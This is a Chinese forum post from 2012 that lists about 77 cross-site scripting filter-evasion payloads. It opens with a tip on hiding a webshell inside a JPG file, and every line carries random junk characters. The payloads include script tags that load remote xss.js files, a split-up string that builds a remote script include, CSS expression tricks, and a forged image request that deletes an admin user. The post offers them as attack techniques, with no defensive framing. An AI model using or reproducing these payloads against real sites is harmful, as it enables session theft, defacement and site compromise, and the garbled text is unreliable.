跨站图片shell: T4 @9 Q1 q+ }' [( c& M$ ^
XSS跨站代码 <script>alert("")</script>
+ @) [" u% |% E1 z3 V0 o
& _% u8 |: B) w' z* p+ h% \3 _3 k" b将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马8 \+ Y& I& ^1 P; G% e# L3 f% Y
6 k1 q, u4 O$ ]" F
& R, N3 g- x6 b# ]
( g: o. h( x' R1 |1 H* V0 J$ C
1)普通的XSS JavaScript注入
. v1 t) O2 z) H<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% _+ `( M# S E* ~" _0 _ T. D
- j. y9 j: B l) ]( y(2)IMG标签XSS使用JavaScript命令( m6 Q3 K$ x/ g {: q* x/ k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) b+ b" _+ z. B* q) c3 u B4 t
" U8 e/ u3 f5 S6 Y# Q8 h- B, @) x(3)IMG标签无分号无引号
" v2 G: M; }0 V) n# e<IMG SRC=javascript:alert(‘XSS’)>6 q7 |) `% a) x
5 p+ y% k9 k# m. m
(4)IMG标签大小写不敏感
& J( W A9 G0 }9 B9 d# C7 N3 Q3 _<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& b- V# V- B7 S& b* W6 K- w# }6 U6 C0 o" A; u
(5)HTML编码(必须有分号)# ?& g- b# J) A4 s0 h- ]' K5 T
<IMG SRC=javascript:alert(“XSS”)>
6 d; l; ^8 o& ^$ T3 V- R; e: u' b/ H, I- K1 f
(6)修正缺陷IMG标签
3 W) L" h3 ^4 l4 B9 [2 e<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: j3 B+ x4 j6 n4 J- r+ S: q( R
$ k* Y) i! @8 I6 v# ]' s- ]4 r
(7)formCharCode标签(计算器)$ Y5 X: p" m4 I$ y0 D. j
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 K8 T, R% Y, p+ s! M1 ^! H
# h. s0 v% N! K2 f0 \(8)UTF-8的Unicode编码(计算器)! [) B0 M/ i( |: [9 h5 Z
<IMG SRC=jav..省略..S')>1 E& \- f2 i3 H- `% J
" y0 Y; J: ], e- [4 G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)& y: R8 ^( }7 p& R
<IMG SRC=jav..省略..S')>
& t x3 [! _0 P. T# H
* _2 @& j5 N0 U$ D9 F(10)十六进制编码也是没有分号(计算器)
# F: N; S( b# [ {0 K<IMG SRC=java..省略..XSS')>
4 `( o: F+ k. t& r
7 B ^9 e, S+ j8 v' w(11)嵌入式标签,将Javascript分开
0 p! P$ e7 X4 ?1 a. {' l7 Q. K<IMG SRC=”jav ascript:alert(‘XSS’);”>" U& Z8 T4 M' k& f5 f+ l+ ~
% h0 G) R" a" y% F4 z0 a
(12)嵌入式编码标签,将Javascript分开
$ s! @ l' m* s8 ?0 Q- g<IMG SRC=”jav ascript:alert(‘XSS’);”>
|9 O y J, D( m7 O4 |& F
3 C" t3 ? `7 R5 m(13)嵌入式换行符/ U, f- A5 z, W& f; o
<IMG SRC=”jav ascript:alert(‘XSS’);”> c% e8 q9 i8 p. ]3 T; E' L
/ q5 n2 a: h" t(14)嵌入式回车, k0 k5 F/ N) g
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- S& e. K A y$ S/ G4 l5 o9 ^7 b( j' h- ]: `5 _1 y" U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 k% V6 B: F9 `<IMG SRC=”javascript:alert(‘XSS‘)”>
) N" F& p, e: {3 X* r8 H5 d7 C8 L d- A! `' u0 x
(16)解决限制字符(要求同页面)
8 J) p9 w! Z9 z- x' I* Q<script>z=’document.’</script>
4 g; L7 |2 a9 ?! c, p<script>z=z+’write(“‘</script>' m0 L/ ?* c1 P; z
<script>z=z+’<script’</script>
; r1 `& {* p( m/ T* ]+ `9 p/ U<script>z=z+’ src=ht’</script>
! T8 B4 p" y$ Y<script>z=z+’tp://ww’</script>* Y1 p( m% j. Q. f5 L/ ~: K) f$ @$ g
<script>z=z+’w.shell’</script>
& l1 k. o" H/ _ u3 M<script>z=z+’.net/1.’</script>
" g: o! L+ |* @ s8 O$ Q<script>z=z+’js></sc’</script>/ V1 X% L3 G) i
<script>z=z+’ript>”)’</script>/ C3 g( V Z2 b- t. t/ X
<script>eval_r(z)</script>
+ Y( u# q. g& O; y/ R2 P& F* n! O- c! `1 Y( P9 _$ `
(17)空字符5 V5 L2 {% ^, y- j! F& \* u( y
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# m9 v: G4 U' R/ D0 Z4 @, Z
; ~. n( ~$ l ]/ d' h0 w: @" [(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 T' M: ?$ S j* `, u; W eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& T/ Z" K2 U3 m( ~- Y2 a+ i8 g
# F8 `7 H# \( P& n% t& q9 Q# L(19)Spaces和meta前的IMG标签
/ ]1 D# f% C' P- @0 t( e<IMG SRC=” javascript:alert(‘XSS’);”>* x5 P `1 p" j2 d7 B0 |9 D1 W5 y
0 v6 ] W5 m2 I(20)Non-alpha-non-digit XSS" F& j' u* W- E0 T* j5 `
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 [( F5 A' d6 r$ }5 M% }% f* [% ]0 l0 n; r- U
(21)Non-alpha-non-digit XSS to 2
6 a. ]2 y0 J/ |<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ a3 t, ?; b- I/ b
. L0 y9 b i3 `' h7 m! g" _/ q(22)Non-alpha-non-digit XSS to 3: y7 M7 l7 Z8 H! b3 M
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- h: a+ i+ w/ C' p- f" x
& e0 f- \# |! S: U( E(23)双开括号
' B% T6 n5 F1 j<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: y! ?6 k: A ~1 q
0 b6 r* _( V7 l, }3 a(24)无结束脚本标记(仅火狐等浏览器)
9 m' v! q$ d- Z( k# \3 q& x' R7 v<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- |& Y' Q1 f8 Y# o8 k/ ^9 H) V
/ c) X0 c" @* l/ e) H" P7 d% V(25)无结束脚本标记2
$ k, i- q: ~7 E7 R2 |9 p) K7 n<SCRIPT SRC=//3w.org/XSS/xss.js>
9 g' |7 t, m$ Z# r0 \% A/ ]/ m; U V
(26)半开的HTML/JavaScript XSS# r5 B2 K) v( P# b0 c
<IMG SRC=”javascript:alert(‘XSS’)”
6 [5 O7 S- Q: E; R1 N6 T) O, s B( X/ P! E6 v7 r
(27)双开角括号
1 [/ ~+ W+ S5 a4 A<iframe src=http://3w.org/XSS.html <
% D6 ?( L7 M8 v) G1 R9 U3 J
2 \9 c: f/ b0 |+ F4 F9 e- L# y( H(28)无单引号 双引号 分号
8 ?. j% W% S4 @' L7 Q6 k, I<SCRIPT>a=/XSS/
$ v( g! T! |3 ^" f) n6 |alert(a.source)</SCRIPT>
9 U: y0 i+ Q C$ m/ H* q" c
9 N4 I; ]0 g* |6 N' H(29)换码过滤的JavaScript& i: D( q8 Z( |+ `) r y6 v" l. x. `7 G
\”;alert(‘XSS’);//. P7 W6 }& V3 S n6 w# F
2 K. D s" j2 U! e! M/ k4 ^7 t* R(30)结束Title标签
- T3 j5 d& s" C1 K7 h- g4 U</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& P9 D$ ^ m4 c; m$ G+ O% c9 p
& _( ]( j) g6 e* I(31)Input Image
- k, T# i- i& J0 W# L! ]" L<INPUT SRC=”javascript:alert(‘XSS’);”>" _9 B; K/ {9 ~0 s
5 m' _, j' ~2 H. \0 g2 R' S8 p(32)BODY Image+ ?' j' p, g3 z$ Y# M- }
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, p4 ~2 c: r8 J$ B w8 m
9 c, g- b/ [2 r' ^# Y. W(33)BODY标签
/ @3 B9 f$ x+ Z( s5 r" C& X<BODY(‘XSS’)>
6 J! K' A: {; |# W4 T0 k' v- c
+ n& [% R+ g( u6 A(34)IMG Dynsrc
. z1 v5 l8 \1 I: T7 O<IMG DYNSRC=”javascript:alert(‘XSS’)”>
) T+ j8 h6 B3 J& o
) v$ ?* k/ ^- _ k% R o) J+ V(35)IMG Lowsrc3 p4 ?8 ~( A( E# t8 l; M) `6 W6 e! o
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 ^1 s: N( ^7 n- y8 \# l; w' f6 B3 \. A; O: z! B9 d
(36)BGSOUND" ^* J" j* q* f9 |
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! A- e4 ~3 K5 s+ |0 y: b( M* e; D: Y9 D, X$ [, A
(37)STYLE sheet2 B; v" N% E. b6 g" J/ p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ [4 ~% X7 D2 C1 J i' E. U* q* h- w/ z
(38)远程样式表
- c9 G5 _* V+ z$ Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! b& _6 q9 e2 x8 Q2 n: ?
3 [2 V7 D% u) [' }3 ~0 `! f(39)List-style-image(列表式)
" L, Y9 O. r- ]3 b' P0 J<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! ]- H# P1 x; N1 P/ B' P i$ G* V9 P) ] M3 h
(40)IMG VBscript# _5 ~( w8 G ]
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; ^% ~( ]; o8 V& z, t
. ~" u) x% y4 A* {, O c9 i(41)META链接url
( |# F6 F& q1 Q4 c8 ~0 o* u<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>- |/ H" |, i, G0 v
8 D, f7 X3 [ R3 X8 }/ ^8 |
(42)Iframe% Q) a2 p$ t8 X3 c3 z! Q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; x; D& h- A" l(43)Frame
4 l# x% w, x7 E5 K! n<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>+ l! x2 i; C5 P/ c4 b. C5 o
# ?1 o2 Q" ~5 x5 o7 Q1 }! V1 R$ x(44)Table3 Z- h0 I# v9 r5 l
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. d, Q! U" E6 N% t9 }: V, U$ w2 J8 `7 {3 z' x7 A4 `/ A$ | Y8 W
(45)TD
) c% Y3 e9 w. J0 o a' R: p# [<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 g8 ~1 s0 P, G7 T: H6 D( \# B
5 ?8 G$ ]3 \: V3 n& A
(46)DIV background-image
/ R( |3 Q( I, }* v$ K& ]& v! s8 k+ `<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 ? t" w3 ~4 X3 }8 N' |
+ Q. N7 o* u; g
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ w2 k1 N( Z8 K( o. A* Q<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>; U* q6 d" u( t% ^4 D6 U |
" N! c2 T7 k+ m(48)DIV expression
* ?: v4 [' a4 |+ e9 M9 D+ C3 t5 w<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ a7 q8 r3 V7 P3 v
. D6 D8 k7 L4 a3 t0 ](49)STYLE属性分拆表达7 a. J, D5 u9 F* v1 w
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! P) E) t: J4 A4 w8 Q5 w2 k% k. Y! |6 x
(50)匿名STYLE(组成:开角号和一个字母开头)
& X; a+ P2 i* ?( I; p5 n8 T<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' s7 A* D+ }9 A: v! a9 W: o& i
- Y2 N# p& p @ S* R
(51)STYLE background-image8 j7 M2 L, l5 V- M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ L; t) b& ]2 _* s, I
3 L* s! t7 o: ~( ]
(52)IMG STYLE方式
$ K( D2 a8 O+ |# @/ sexppression(alert(“XSS”))’>" v5 ~1 S- ^1 {& F+ V
/ M' s2 | {! x) ?* f1 Z(53)STYLE background
! D& e; f- G/ N2 x0 h<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 @. G. a: W( w$ ` ?# K9 U! i, X
# K1 c u0 V% Y(54)BASE
- O5 |2 L" w1 S K O1 }2 u' H! t<BASE HREF=”javascript:alert(‘XSS’);//”>
. o9 d3 ?) P0 V6 g* [/ [+ o: z3 L. V0 B
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ a T" n' R+ y( H/ w* Y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
?( O4 m1 r' m+ t, x# w+ g0 \- U. Z [6 U& @
(56)在flash中使用ActionScrpt可以混进你XSS的代码/ I8 ~( T7 s' Z* R
a=”get”;: Z" m: M% D+ v9 O* w' N# N5 I! z2 W
b=”URL(\”";6 v) {, z0 \" T5 u/ |
c=”javascript:”;
9 V- l" \( ]" P" K" [d=”alert(‘XSS’);\”)”;9 {* P1 F$ o; M0 e6 G2 A
eval_r(a+b+c+d);
) I2 l0 j& g" Z* M
7 y' N( Y& s' J- S; K' Q(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. X: E9 C7 A4 P2 L& x8 P<HTML xmlns:xss>( m) g$ k5 \2 p" e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 e- h* M4 N3 X z) V. _<xss:xss>XSS</xss:xss>
2 ~9 }( _# l" P. d) n</HTML>
9 c1 j. u8 T. X6 p' Z
$ N+ _6 {( W1 Q! R( h9 E! P& @7 j- N(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
: M/ h% i" w2 Z7 v; z+ H<SCRIPT SRC=””></SCRIPT>
0 h2 E. l5 n; g# Z$ Z- ~9 v% a$ N- A
(59)IMG嵌入式命令,可执行任意命令
% r, Z5 @9 w2 O# T' ?* I9 D( \% e<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' o' a' i. T- d" P1 S
* Y; k: H2 }) w(60)IMG嵌入式命令(a.jpg在同服务器)
; R9 i2 O" f* |1 oRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 T, y" Y/ X/ t) n. \
5 a1 @9 T6 @# V, z(61)绕符号过滤. N, b, a' M! f" Y0 A1 m- E
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ K4 X) Q8 m, b1 G: ~( n
+ h" |1 W8 t) G& |% i(62). a6 ^5 G. p/ U) ^; {) Q* S) g3 m
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) L2 G6 C+ {8 B
( I# b1 S" S! R% d1 P
(63)
4 _2 z* Z3 ?7 o<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
* }% W0 Z( M/ G4 v3 ]& \5 f. J b; e& k P1 V
(64)
8 }( b) t4 L7 |! I5 |<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) ~( v4 H: h8 t' b( Y2 g* _9 T9 x, l' v
(65)) E2 X# _9 ^! e- C
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 y r$ `( U, _7 Y$ Q2 j/ |) l2 I- ?1 `, p9 }7 H2 N: @
(66)
" J2 p+ i+ P) F2 J<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># x; H) ^* I1 S1 \! H
+ B/ f6 `# t5 j; J7 o
(67)0 s* y) y5 u9 t/ |# n g. p2 O
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>8 d; [6 A$ {: a+ d
# {. u V7 W; r; a2 Y$ ^ x(68)URL绕行 S% q0 w: i5 X
<A HREF=”http://127.0.0.1/”>XSS</A>
+ U' r% V5 Y# ^, c5 ?! U8 M* T5 P8 g
(69)URL编码
G* d/ L( T* r<A HREF=”http://3w.org”>XSS</A>
% R9 N! p8 P) A& K0 d% ]" K/ K: z5 M6 j7 w6 k
(70)IP十进制
2 O/ r- i$ T8 ]9 [+ r! s<A HREF=”http://3232235521″>XSS</A>
3 e+ d* p5 x3 v" |+ t1 \
; W1 a+ `$ M3 T1 e# [& z(71)IP十六进制
- y+ W* {7 i8 G) i2 N# b1 h. J- X<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' h b/ U- o* R& c2 B
; \8 b- v1 x$ {3 y8 e
(72)IP八进制
; s1 `/ y+ [$ i& P<A HREF=”http://0300.0250.0000.0001″>XSS</A>
8 Z5 ~) S5 p, Z. B# P7 O
' G, P% Q; [2 v( m3 V7 F) C(73)混合编码3 u1 ~( ]" o; i0 w4 @0 C' l3 `
<A HREF=”h
; p' g' I6 z( U7 F, _- ~: ett p://6 6.000146.0×7.147/”">XSS</A>1 H8 K j6 l& S; Q4 K8 l+ x) p7 g
8 V) B& B% u: b# P
(74)节省[http:]0 Z* ?3 |6 W% @( ?$ s0 V; W
<A HREF=”//www.google.com/”>XSS</A>* C7 F2 o' f% [) [% m
3 k9 ? u4 [- E! k* R- O4 H: q(75)节省[www]
1 ^2 d4 h) S% Q- N+ b; B5 G<A HREF=”http://google.com/”>XSS</A>
2 D3 l9 P7 h, b4 J7 O0 T8 [9 [
. M/ r) B% }0 m4 ^( u) \(76)绝对点绝对DNS
, C2 `' ^* H2 R<A HREF=”http://www.google.com./”>XSS</A>
* g0 g* V% n" x# o$ s( ?" E% q/ ^' n% K3 Z& H
(77)javascript链接+ H7 P1 A1 C6 o& d/ x; c$ \
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>9 X& _" M) _: ]$ R3 E. x" d
|
发表于 2012-9-13 17:04:56
收藏
支持
反对